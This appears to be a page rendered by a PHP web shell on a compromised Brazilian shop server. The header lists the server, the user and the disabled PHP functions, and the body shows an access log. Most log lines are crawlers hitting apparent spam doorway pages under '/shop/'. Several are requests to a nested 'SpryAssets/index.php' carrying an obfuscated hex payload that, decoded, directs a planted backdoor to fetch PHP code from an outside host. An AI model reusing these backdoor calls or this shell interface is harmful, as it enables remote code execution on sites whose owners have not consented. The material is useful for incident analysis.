HEX
Server: Apache
System: Linux vpshost0528.publiccloud.com.br 4.4.79-grsec-1.lc.x86_64 #1 SMP Wed Aug 2 14:18:21 -03 2017 x86_64
User: novoprovisorio2 (10002)
PHP: 7.4.11
Disabled: apache_child_terminate,dl,escapeshellarg,escapeshellcmd,exec,link,mail,openlog,passthru,pcntl_alarm,pcntl_exec,pcntl_fork,pcntl_get_last_error,pcntl_getpriority,pcntl_setpriority,pcntl_signal,pcntl_signal_dispatch,pcntl_sigprocmask,pcntl_sigtimedwait,pcntl_sigwaitinfo,pcntl_strerror,pcntl_wait,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,php_check_syntax,php_strip_whitespace,popen,proc_close,proc_open,shell_exec,symlink,system
Upload Files
File: /home/novoprovisorio2/logs/access_log20260426
40.77.167.1 - - [26/Apr/2026:00:00:02 -0300] "GET /shop/blundering/arborization464232525137.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:05 -0300] "GET /shop/eriocnemis/pithole032180582203.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:08 -0300] "GET /shop/promptest/unpleasantry021520761112.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:11 -0300] "GET /shop/dissensious/andrena031253672697.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:14 -0300] "GET /shop/impermeably/impersonalis052430721057.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.20.71 - - [26/Apr/2026:00:00:15 -0300] "GET /shop/zoophytology/naphthalic042848698265.htm HTTP/1.1" 404 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
40.77.167.1 - - [26/Apr/2026:00:00:17 -0300] "GET /shop/albellus/catty031428968820.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:55:20 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353732302p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323132302q6530633432356636313061643262353064633065326164643666653838643131222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
207.46.13.125 - - [26/Apr/2026:00:00:19 -0300] "GET /shop/vanglo/wived033236151740.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
186.14.33.171 - - [26/Apr/2026:00:00:19 -0300] "GET /produto/tapete-capacho-vinil-personalizado-120-x-070-vulcanizado/ HTTP/1.1" 200 78976 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:20 -0300] "GET /shop/todus/unequaled021978610047.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.125 - - [26/Apr/2026:00:00:20 -0300] "GET /shop/perspective/manteltree012890317064.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:23 -0300] "GET /shop/foible/glasssnake022133773906.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:26 -0300] "GET /shop/involucrum/coessentiality07427765371.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.136 - - [26/Apr/2026:00:00:29 -0300] "GET /shop/basset/flippantly013763414581.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:29 -0300] "GET /shop/converging/detrusive101205648267.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.136 - - [26/Apr/2026:00:00:30 -0300] "GET /shop/ratitate/recharter022244962161.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:32 -0300] "GET /shop/juppo/dialling02796832850.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.125 - - [26/Apr/2026:00:00:33 -0300] "GET /shop/chilliness/intercrossed031812935982.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:35 -0300] "GET /shop/aberrational/posttiller021621580630.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.125 - - [26/Apr/2026:00:00:36 -0300] "GET /shop/tigerine/sumac022530104711.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:38 -0300] "GET /shop/stoccade/light043580650877.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
207.46.13.125 - - [26/Apr/2026:00:00:39 -0300] "GET /shop/nudation/scrophularineae012970494182.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:55:41 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353734312p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323134312q6134303663363538633566353434303361333764356535386433626635343064222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.1 - - [26/Apr/2026:00:00:41 -0300] "GET /shop/linoleic/purpart431855717993.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
177.75.135.187 - - [26/Apr/2026:00:00:42 -0300] "GET /shop/smallest/fabler502546207671.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:44 -0300] "GET /shop/lobiped/demitint063058414412.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.52 - - [26/Apr/2026:00:00:45 -0300] "GET /shop/onomatopoeia/countercharge0369272268.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.52 - - [26/Apr/2026:00:00:46 -0300] "GET /shop/reciprocous/bumptious012136130586.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:47 -0300] "GET /shop/beefeater/modernizer104262599185.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.70.109 - - [26/Apr/2026:00:00:48 -0300] "GET /species/example/fj7048vbkizl6xg.html HTTP/1.1" 200 243425 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.177 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.52 - - [26/Apr/2026:00:00:49 -0300] "GET /shop/historians/convulse02577799313.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:50 -0300] "GET /shop/lycanthropist/plausible03299086301.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.52 - - [26/Apr/2026:00:00:51 -0300] "GET /shop/bituminize/liturgist01300453002.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:53 -0300] "GET /shop/rectovesical/quadrijugous00668491161.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.20.34 - - [26/Apr/2026:00:00:53 -0300] "GET /shop/pained/rhombogen02351229337.htm HTTP/1.1" 404 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.55.39.52 - - [26/Apr/2026:00:00:54 -0300] "GET /shop/coneincone/sternly032580941412.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.1 - - [26/Apr/2026:00:00:56 -0300] "GET /shop/newspaper/phlegmaticly061718464423.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.48 - - [26/Apr/2026:00:00:59 -0300] "GET /shop/naturist/standerath021567571177.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:00 -0300] "GET /shop/encharge/effusiveness012856389.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.48 - - [26/Apr/2026:00:01:01 -0300] "GET /shop/torulose/dwarfs022943703563.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:56:02 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353736322p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323136322q6133383636396138316132633234653632663862383164306234393661653230222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
157.55.39.12 - - [26/Apr/2026:00:01:02 -0300] "GET /shop/rudimental/sirkeer06691606482.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.48 - - [26/Apr/2026:00:01:02 -0300] "GET /shop/gurding/inextensible021655170603.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:05 -0300] "GET /shop/palaeichthyes/tormentry01917956927.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.48 - - [26/Apr/2026:00:01:05 -0300] "GET /shop/mooder/vulpinic013116589559.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:08 -0300] "GET /shop/struggled/steepdown41900385826.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.48 - - [26/Apr/2026:00:01:08 -0300] "GET /shop/anywhere/faultful03268092639.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.48 - - [26/Apr/2026:00:01:11 -0300] "GET /shop/epistrophe/patriciate012813426273.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:12 -0300] "GET /shop/corning/integrity062913097739.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
113.172.7.15 113.172.7.15 - - [26/Apr/2026:00:01:12 -0300] "GET /shop/demising/spirable053396758524.htm HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:14 -0300] "GET /shop/vernier/premillennial021351132696.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.136 - - [26/Apr/2026:00:01:16 -0300] "GET /shop/partable/microcrystalline032960037431.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:17 -0300] "GET /shop/salubriousness/vaporousness024223818444.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.136 - - [26/Apr/2026:00:01:18 -0300] "GET /shop/tenthly/turanians031701884087.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:20 -0300] "GET /shop/threader/imaginal01415561833.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.136 - - [26/Apr/2026:00:01:21 -0300] "GET /shop/blowly/infiltration037308489.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:23 -0300] "GET /shop/eternize/stillhunting012081005835.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:56:24 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353738342p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323138342q6435313932653663393864386366646434386430306236366332343936353138222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.136 - - [26/Apr/2026:00:01:24 -0300] "GET /shop/acetocella/pinch022771118331.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:26 -0300] "GET /shop/filical/sursum012961170533.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.136 - - [26/Apr/2026:00:01:27 -0300] "GET /shop/stegnotic/primula011495243368.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:28 -0300] "GET /shop/moieties/bowery013544127111.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.20.60 - - [26/Apr/2026:00:01:31 -0300] "GET /shop/hogsty/guideress053098156754.htm HTTP/1.1" 404 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.55.39.12 - - [26/Apr/2026:00:01:34 -0300] "GET /shop/hexagrammos/slater022043791178.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:35 -0300] "GET /shop/shrinker/gimel062706392973.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:38 -0300] "GET /shop/influx/diastrophus031658192371.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:41 -0300] "GET /shop/octaroon/vatful0635137758.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:44 -0300] "GET /shop/stenophyllous/helical033899106213.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:56:45 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353830352p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323230352q3036613566376632393430616665643864313036396463316534373030343566222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
40.77.167.136 40.77.167.136 - - [26/Apr/2026:00:01:47 -0300] "GET /shop/steely/pennisetum0936013726.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:47 -0300] "GET /shop/whachamacallit/pearleyed014182083245.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:50 -0300] "GET /shop/boomslange/mobilized002159005928.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:53 -0300] "GET /shop/bighearted/waitress01529417337.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
104.0.109.7 - - [26/Apr/2026:00:01:55 -0300] "GET /2152181152?entity=2149269602 HTTP/1.1" 500 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11_7_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.265 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:56 -0300] "GET /shop/antemural/abstinence023274698662.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:01:59 -0300] "GET /shop/christen/tinselling064048371213.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:02:02 -0300] "GET /shop/soyned/aikinite13954416189.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.188.53.154 - - [25/Apr/2026:23:57:06 -0300] "GET /form/SpryAssets/SpryAssets/SpryAssets/index.php?ARRAY=7o2230223n313737373137353832362p2231223n22687474703n5p2s5p2s6877623135377630392r6772616r646s2r686169725p2s3s6p633q7068705s636s64655s6n6326743q313737373137323232362q3538653232623334316465623063383165383134653662376636313935373465222p2232223n223233643434313839633862323032656338666339386332353131633532336431222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34372q35352q36322q37312q38342q3330227q HTTP/1.0" 504 247 "-" "-"
157.55.39.12 - - [26/Apr/2026:00:02:06 -0300] "GET /shop/marinism/teosinte03539708108.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
57.141.20.31 - - [26/Apr/2026:00:02:07 -0300] "GET /shop/confiture/demagogy0559832712.htm HTTP/1.1" 404 - "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
157.55.39.12 - - [26/Apr/2026:00:02:08 -0300] "GET /shop/corymbosely/populus003639602345.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:02:10 -0300] "GET /shop/blood/spumid032986543120.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:02:13 -0300] "GET /shop/satanism/casein021457573635.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:02:16 -0300] "GET /shop/ichor/ditolyl432076852914.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
157.55.39.12 - - [26/Apr/2026:00:02:20 -0300] "GET /shop/rutterkin/trappy013818924265.htm HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
